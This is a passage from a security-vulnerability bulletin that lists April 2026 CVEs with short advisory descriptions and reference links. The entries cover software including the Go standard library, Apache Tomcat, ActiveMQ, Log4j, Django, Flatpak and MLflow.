2026-04-11 | not yet calculated | CVE-2026-32146 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j https://cna.erlef.org/cves/CVE-2026-32146.html https://osv.dev/vulnerability/EEF-CVE-2026-32146 https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78 |
| Go standard library--crypto/x509 | During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls. | 2026-04-08 | not yet calculated | CVE-2026-32280 | https://go.dev/cl/758320 https://go.dev/issue/78282 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4947 |
| Go standard library--crypto/x509 | Validating certificate chains which use policies is unexpectedly inefficient when certificates in the chain contain a very large number of policy mappings, possibly causing denial of service. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool. | 2026-04-08 | not yet calculated | CVE-2026-32281 | https://go.dev/cl/758061 https://go.dev/issue/78281 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4946 |
| Go standard library--internal/syscall/unix | On Linux, if the target of Root.Chmod is replaced with a symlink while the chmod operation is in progress, Chmod can operate on the target of the symlink, even when the target lies outside the root. The Linux fchmodat syscall silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Root.Chmod checks its target before acting and returns an error if the target is a symlink lying outside the root, so the impact is limited to cases where the target is replaced with a symlink between the check and operation. | 2026-04-08 | not yet calculated | CVE-2026-32282 | https://go.dev/cl/763761 https://go.dev/issue/78293 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4864 |
| Go standard library--crypto/tls | If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service. This only affects TLS 1.3. | 2026-04-08 | not yet calculated | CVE-2026-32283 | https://go.dev/cl/763767 https://go.dev/issue/78334 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4870 |
| Go standard library--archive/tar | tar.Reader can allocate an unbounded amount of memory when reading a maliciously-crafted archive containing a large number of sparse regions encoded in the "old GNU sparse map" format. | 2026-04-08 | not yet calculated | CVE-2026-32288 | https://go.dev/cl/763766 https://go.dev/issue/78301 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4869 |
| Go standard library--html/template | Context was not properly tracked across template branches for JS template literals, leading to possibly incorrect escaping of content when branches were used. Additionally template actions within JS template literals did not properly track the brace depth, leading to incorrect escaping being applied. These issues could cause actions within JS template literals to be incorrectly or improperly escaped, leading to XSS vulnerabilities. | 2026-04-08 | not yet calculated | CVE-2026-32289 | https://go.dev/cl/763762 https://go.dev/issue/78331 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4865 |
| Apache Software Foundation--Apache Cassandra | Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows authenticated user to raise query latencies via repeated password changes. Users are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue. | 2026-04-07 | not yet calculated | CVE-2026-32588 | https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc |
| Apache Software Foundation--Apache Tomcat | Improper Input Validation vulnerability in Apache Tomcat due to an incomplete fix of CVE-2025-66614. This issue affects Apache Tomcat: from 11.0.15 through 11.0.19, from 10.1.50 through 10.1.52, from 9.0.113 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-32990 | https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7 |
| Apache Software Foundation--Apache OpenMeetings | Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings. Any registered user can query web service with their credentials and get files/sub-folders of any folder by ID (metadata only NOT contents). Metadata includes id, type, name and some other field. Full list of fields get be checked at FileItemDTO object. This issue affects Apache OpenMeetings: from 3.10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-33005 | https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. `MultiPartParser` allows remote attackers to degrade performance by submitting multipart uploads with `Content-Transfer-Encoding: base64` including excessive whitespace. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue. | 2026-04-07 | not yet calculated | CVE-2026-33033 | Django security archive Django releases announcements Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or understated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to load an unbounded request body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Superior for reporting this issue. | 2026-04-07 | not yet calculated | CVE-2026-33034 | Django security archive Django releases announcements Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 |
| Six Apart Ltd.--Movable Type | Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement. | 2026-04-08 | not yet calculated | CVE-2026-33088 | https://movabletype.org/news/2026/04/mt-907-released.html https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html https://jvn.jp/en/jp/JVN66473735/ |
| Acronis--Acronis True Image OEM | Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902. | 2026-04-10 | not yet calculated | CVE-2026-33092 | SEC-9407 |
| Apache Software Foundation--Apache ActiveMQ Client | Improper validation and restriction of a classpath path name vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web, Apache ActiveMQ. In two instances (when creating a Stomp consumer and also browsing messages in the Web console) an authenticated user provided "key" value could be constructed to traverse the classpath due to path concatenation. As a result, the application is exposed to a classpath path resource loading vulnerability that could potentially be chained together with another attack to lead to exploit. This issue affects Apache ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that is limited to non-Windows environments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3. | 2026-04-07 | not yet calculated | CVE-2026-33227 | https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Prior to 17.4.8 and 17.10.1, an improperly protected scripting API allows any user with script right to bypass the sandboxing of the Velocity scripting API and execute, e.g., arbitrary Python scripts, allowing full access to the XWiki instance and thereby compromising the confidentiality, integrity and availability of the whole instance. Note that script right already constitutes a high level of access that we don't recommend giving to untrusted users. This vulnerability is fixed in 17.4.8 and 17.10.1. | 2026-04-08 | not yet calculated | CVE-2026-33229 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9 https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63 https://jira.xwiki.org/browse/XWIKI-23698 https://jira.xwiki.org/browse/XWIKI-23702 |
| Apache Software Foundation--Apache OpenMeetings | Use of Hard-coded Cryptographic Key vulnerability in Apache OpenMeetings. The remember-me cookie encryption key is set to default value in openmeetings.properties and not being auto-rotated. In case OM admin hasn't changed the default encryption key, an attacker who has stolen a cookie from a logged-in user can get full user credentials. This issue affects Apache OpenMeetings: from 6.1.0 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-33266 | https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66 |
| ICZ Corporation--MATCHA INVOICE | Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server. | 2026-04-08 | not yet calculated | CVE-2026-33273 | https://oss.icz.co.jp/news/?p=1386 https://jvn.jp/en/jp/JVN33581068/ |
| OpenIdentityPlatform--OpenAM | Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages). This vulnerability is fixed in 16.0.6. | 2026-04-07 | not yet calculated | CVE-2026-33439 | https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj |
| Checkmk GmbH--Checkmk | Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins. | 2026-04-10 | not yet calculated | CVE-2026-33455 | https://checkmk.com/werk/17988 |
| Checkmk GmbH--Checkmk | Livestatus injection in the notification test mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description. | 2026-04-10 | not yet calculated | CVE-2026-33456 | https://checkmk.com/werk/17989 |
| Checkmk GmbH--Checkmk | Livestatus injection in the prediction graph page in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value. | 2026-04-10 | not yet calculated | CVE-2026-33457 | https://checkmk.com/werk/17990 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38. | 2026-04-10 | not yet calculated | CVE-2026-33698 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | not yet calculated | CVE-2026-33703 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5 |
| Go standard library--crypto/x509 | When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool. | 2026-04-08 | not yet calculated | CVE-2026-33810 | https://go.dev/cl/763763 https://go.dev/issue/78332 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4866 |
| github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 | Memory-safety vulnerability in github.com/jackc/pgx/v5. | 2026-04-07 | not yet calculated | CVE-2026-33815 | https://pkg.go.dev/vuln/GO-2026-4771 |
| github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 | Memory-safety vulnerability in github.com/jackc/pgx/v5. | 2026-04-07 | not yet calculated | CVE-2026-33816 | https://pkg.go.dev/vuln/GO-2026-4772 |
| Mlflow--Mlflow | MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. This issue affects MLflow version through 3.10.1 | 2026-04-07 | not yet calculated | CVE-2026-33865 | https://github.com/mlflow/mlflow/pull/21435 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors |
| Mlflow--Mlflow | MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access‑control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow version through 3.10.1 | 2026-04-07 | not yet calculated | CVE-2026-33866 | https://github.com/mlflow/mlflow/pull/21708 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors |
| Apache Software Foundation--Apache OpenMeetings | Use of GET Request Method With Sensitive Query Strings vulnerability in Apache OpenMeetings. The REST login endpoint uses HTTP GET method with username and password passed as query parameters. Please check references regarding possible impact This issue affects Apache OpenMeetings: from 3.1.3 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-34020 | https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db |
| flatpak--flatpak | Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the Flatpak portal accepts paths in the sandbox-expose options which can be app-controlled symlinks pointing at arbitrary paths. Flatpak run mounts the resolved host path in the sandbox. This gives apps access to all host files and can be used as a primitive to gain code execution in the host context. This vulnerability is fixed in 1.16.4. | 2026-04-07 | not yet calculated | CVE-2026-34078 | https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q-qc34-jprg |
| flatpak--flatpak | Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the caching for ld.so removes outdated cache files without properly checking that the app controlled path to the outdated cache is in the cache directory. This allows Flatpak apps to delete arbitrary files on the host. This vulnerability is fixed in 1.16.4. | 2026-04-07 | not yet calculated | CVE-2026-34079 | https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x-r292-46pp |
| flatpak--xdg-dbus-proxy | xdg-dbus-proxy is a filtering proxy for D-Bus connections. Prior to 0.1.7, a policy parser vulnerability allows bypassing eavesdrop restrictions. The proxy checks for eavesdrop=true in policy rules but fails to handle eavesdrop ='true' (with a space before the equals sign) and similar cases. Clients can intercept D-Bus messages they should not have access to. This vulnerability is fixed in 0.1.7. | 2026-04-07 | not yet calculated | CVE-2026-34080 | https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677 |
| Hydrosystem--Control System | Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically the attacker could run PHP scripts directly on the connected database.This issue was fixed in Hydrosystem Control System version 9.8.5 | 2026-04-09 | not yet calculated | CVE-2026-34184 | https://cert.pl/posts/2026/04/CVE-2026-4901/ https://www.hydrosystem.poznan.pl/ |
| Hydrosystem--Control System | Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database.This issue was fixed in Hydrosystem Control System version 9.8.5 | 2026-04-09 | not yet calculated | CVE-2026-34185 | https://cert.pl/posts/2026/04/CVE-2026-4901/ https://www.hydrosystem.poznan.pl/ |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue | 2026-04-07 | not yet calculated | CVE-2026-34197 | https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, the @nyariv/sandboxjs parser contains unbounded recursion in the restOfExp function and the lispify/lispifyExpr call chain. An attacker can crash any Node.js process that parses untrusted input by supplying deeply nested expressions (e.g., ~2000 nested parentheses), causing a RangeError: Maximum call stack size exceeded that terminates the process. This vulnerability is fixed in 0.8.36. | 2026-04-06 | not yet calculated | CVE-2026-34211 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26 |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, a scope modification vulnerability exists in @nyariv/sandboxjs. The vulnerability allows untrusted sandboxed code to leak internal interpreter objects through the new operator, exposing sandbox scope objects in the scope hierarchy to untrusted code; an unexpected and undesired exploit. While this could allow modifying scopes inside the sandbox, code evaluation remains sandboxed and prototypes remain protected throughout the execution. This vulnerability is fixed in 0.8.36. | 2026-04-06 | not yet calculated | CVE-2026-34217 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (means they can see each other's tickets) could see fields which are not intended for customers - including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these field. This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34248 | https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978 |
| Sonatype--Nexus Repository | A reflected cross-site scripting vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted URL. Exploitation requires user interaction. | 2026-04-08 | not yet calculated | CVE-2026-3438 | https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50609137161363 |
| scoder--lupa | Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution. | 2026-04-06 | not yet calculated | CVE-2026-34444 | https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm |
| Python Software Foundation--CPython | When calling base64.b64decode() or related functions the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. This can lead to data being accepted which may be processed differently by other implementations. Use "validate=True" to enable stricter processing of base64 data. | 2026-04-10 | not yet calculated | CVE-2026-3446 | https://github.com/python/cpython/pull/145267 https://github.com/python/cpython/issues/145264 https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/ https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474 https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa |
| Apache Software Foundation--Apache Log4j Core | The fix for CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName attribute of the <Ssl> element. Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value. A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met: * An SMTP, Socket, or Syslog appender is in use. * TLS is configured via a nested <Ssl> element. * The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured. This issue does not affect users of the HTTP appender, which uses a separate verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName attribute that was not subject to this bug and verifies host names by default. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34477 | https://github.com/apache/logging-log4j2/pull/4075 https://logging.apache.org/security.html#CVE-2026-34477 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4 |
| Apache Software Foundation--Apache Log4j Core | Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly: * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output. * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34478 | https://github.com/apache/logging-log4j2/pull/4074 https://logging.apache.org/security.html#CVE-2026-34478 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt |
| Apache Software Foundation--Apache Log4j 1 to Log4j 2 bridge | The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records. Two groups of users are affected: * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file. * Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class. Users are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge. | 2026-04-10 | not yet calculated | CVE-2026-34479 | https://github.com/apache/logging-log4j2/pull/4078 https://logging.apache.org/security.html#CVE-2026-34479 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on |
| Apache Software Foundation--Apache Log4j Core | Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output. | 2026-04-10 | not yet calculated | CVE-2026-34480 | https://github.com/apache/logging-log4j2/pull/4077 https://logging.apache.org/security.html#CVE-2026-34480 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb |
| Apache Software Foundation--Apache Log4j JSON Template Layout | Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34481 | https://github.com/apache/logging-log4j2/pull/4080 https://logging.apache.org/security.html#CVE-2026-34481 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/json-template-layout.html https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv |
| Apache Software Foundation--Apache Tomcat | Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117 , which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34483 | https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b |
| Apache Software Foundation--Apache Tomcat | Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due to the fix for CVE-2026-29146 allowing the bypass of the EncryptInterceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34486 | https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly |
| Apache Software Foundation--Apache Tomcat | Insertion of Sensitive Information into Log File vulnerability in the cloud membership for clustering component of Apache Tomcat exposed the Kubernetes bearer token. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.13 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34487 | https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h |
| Apache Software Foundation--Apache Tomcat | CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M14 through 11.0.20, from 10.1.22 through 10.1.53, from 9.0.92 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-34500 | https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2 |
| Apache Software Foundation--Apache Airflow | Apache Airflow versions 3.0.0 through 3.1.8 DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role.This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only. Airflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results. Users are recommended to upgrade to Apache Airflow 3.2.0 which resolves this issue. | 2026-04-09 | not yet calculated | CVE-2026-34538 | https://github.com/apache/airflow/pull/64415 https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl |
| randombit--botan | Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name; it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the cert it found and the cert it was passed were actually the same certificate. In 3.11.0 an extension of path validation logic was made which assumed that certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it itself were a trusted root. , This vulnerability is fixed in 3.11.1. | 2026-04-07 | not yet calculated | CVE-2026-34580 | https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827 |
